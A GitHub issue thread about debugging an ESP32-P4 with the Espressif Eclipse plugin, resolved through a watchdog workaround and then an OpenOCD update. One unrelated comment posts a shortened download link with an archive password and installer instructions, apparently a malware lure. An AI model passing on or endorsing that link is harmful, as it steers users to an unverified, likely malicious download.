espressif/idf-eclipse-plugin #1039: [Eclipse 2024-03, idf-eclipse-plugin v3.0.0] Unable to debug ESP32-P4

GTCLive, 2024-08-27:
Operating System: linux
Java Runtime Version: 17.0.12+7
Eclipse Version: 4.31.100.v20240229-0520
Eclipse CDT Version: 11.5.0.202312062348
IDF Eclipse Plugin Version: 3.0.0.202406051940
ESP-IDF v5.4-dev-2472-gc9df77efbf

Hi guys. Upgraded to 2024-03 to give the new LSP Editor implementation a shot and I think it's a great improvement. Awesome work from Team Espressif once again!

However, I am having difficulties with a ESP32-P4NRW32 silicon though. Incapable to debug with the default settings. Not entirely sure if I'm doing anything wrong of if this is something I should bring to your attention (bug?). Regardless, I'm putting this here for review. Let me know if you need any screengrabs or logs. 

[image]

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

erhankur, 2024-09-19:
@GTCLive Can you disable the Watchdogs (Interrupt and Task Wdts) from the menuconfig and try again?

GTCLive, 2024-09-19:
[image]

[image]

@erhankur 
Oh wow. It's Alive!! You're right, thanks so much for the heads up and workaround. Screengrabs for others shall any confusion about disabling the WDs arise. Works greats at my end. 

Note: compiled against the latest esp-14.2.0_20240906 toolchain. Master branch 5.4. Fwiw.

erhankur, 2024-10-09:
@GTCLive Possible fix has been merged into the OpenOCD master branch. [542d1d75fcadf35ff70738f6aaeead420f4d80da](https://github.com/espressif/openocd-esp32/commit/542d1d75fcadf35ff70738f6aaeead420f4d80da) 

Can you verify if it works for you, too? Thanks

GTCLive, 2024-10-10:
@erhankur Didn't get lucky this time. It now stop at a user breakpoint, which it wasn't before, and so that's an improvement already. However pressing the 'Step Over' arrow sends it off looping continuously. Let me know if you suspect that I'm doing anything wrong, I'll give it another shot. (ps. tried twice; a blinky as above (failed), and that simple template as per visual below (also failed.)

[image]

[image]

GTCLive, 2024-10-10:
@erhankur Wait wait... do I need to recompile esp-idf or anything?? I see your PR is in /espressif/openocd-esp32. I've just updated/checkout the /espressif/esp-idf master branch and updated the tools before that test above.  Prolly explains it...

Anything more specific I need to do please shout, happy to test if you need.

erhankur, 2024-10-10:
@GTCLive Yes, you need to update your OpenOCD with the unreleased version. 

You can get the latest one from here. https://github.com/espressif/openocd-esp32/actions/runs/11263636120

GTCLive, 2024-10-10:
@erhankur Ah. Ofc. (thanks!). 

Ok, I've done that, took a backup (copy 1) of my released version, and replaced the content of the openocd-esp folder with the /bin/ & /share/ content from the one you linked up.  Exact same file structure, yet unhappy with the espressif kit :(

Guess we'll have to wait for the release to give it a go. I honestly wouldn't know where to look in the source-code to make this work, and the last thing I want is to make you waste your time (and patience!). I'll keep an eye open for the release and update. 

[image]

erhankur, 2024-10-10:
Ok. No worries. I think we will have a new release soon with several p4 bug fixes. Thanks for your help and patience.

erhankur, 2024-10-29:
@GTCLive IDF master branch is updated with the new OpenOCD release. Please check it out, run install.sh and use the latest OpenOCD with your P4 environment.

GTCLive, 2024-10-31:
@erhankur 
Fixed. Top quality. And much appreciated on behalf of world. 

Closing this.

closed 2024-10-31 by GTCLive